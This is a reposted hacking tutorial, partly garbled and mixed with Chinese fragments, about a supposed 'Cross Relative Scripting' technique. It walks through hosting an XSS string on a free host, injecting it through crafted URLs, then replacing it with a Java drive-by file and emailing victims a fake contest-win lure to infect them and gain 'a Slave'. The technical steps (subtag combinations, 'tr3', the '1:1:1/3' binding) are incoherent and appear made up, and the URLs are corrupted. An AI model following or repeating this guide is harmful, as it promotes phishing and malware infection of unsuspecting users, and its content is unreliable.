介绍 XRS 是Cross Relative Scripting Which Means Scripting the site With 3Rd Party resource. With XRS We can Do Spreading,XSS Tunnel,Phishing Etc.As it was a very affective method,but we still Exactly Does Not Know Who was Founded It.But it was Full of Wothy .So Guys Today 我们将来了解一下他 Founders Not Exactly Known " Anon- What It affects Spreading,XSS Tunnel,Phishing Etc So,We Have Discussed a quite About it.Now to Main Intro Finding Vuln. It was the Long duration taking process in XRS . before going to this we need to know what is Sub tags.ie. Code: t= b= h= r= tw= etc are called sub tags.there will be 10-10,000 subtags based on site.every subtag have its own importance. if we need to find a vuln You have Something like this: Code: HdhCmsTest2cto测试数据 /h=x&t=x The combination of any two subtags with any symbol like%#@% etc. are likely vuln to XRS So,now Collect all the Sub Tags. 1.1 :Checking For "tr3" First of All We need to Know what is "tr3".Tr3 meand the link will be Subsitubable.So,it means It can be Exucutable With 1 sub tag. Code: HdhCmsTestx测试数据/h=x%z=*--(0) If it was excuted without any error viola we can proceed To next. Hacking With XRS Ok , its time to inject XRS First,We need A host .Go to Google and Search for free internet. Regester any one and open ftp. Now Creat A txt file called "tr03"And Kepp the XSS String in it. Upload It To Host. Copy link.voila We complted basic go to: Code: HdhCmsTest2cto测试数据 /h=x(<.>(Your host link without brackets)%z=*--(0>(Size of tr03 file) Ok Now You Will get pop up Like "Ha ha XSS" based on your String. Now its time to spreading.:.> Delete The Existing File And Reupload one which is binded with your javadriveby The binding Should 1:1:1/3 ((Very Important)) Upload it. Now EDit XSS String inside As,[Your number was 545436 You have Won this Contest click ok proceed] and done .E-mail it to Some Shit members After clicking ok .they Will get java drive by card.some will click ok. Then finish you got a Slave. Thanks For reading.Hope you Find it Useful.
查看更多关于XRS - Cross Relative Scripting - 网站安全 - 自学php的详细内容...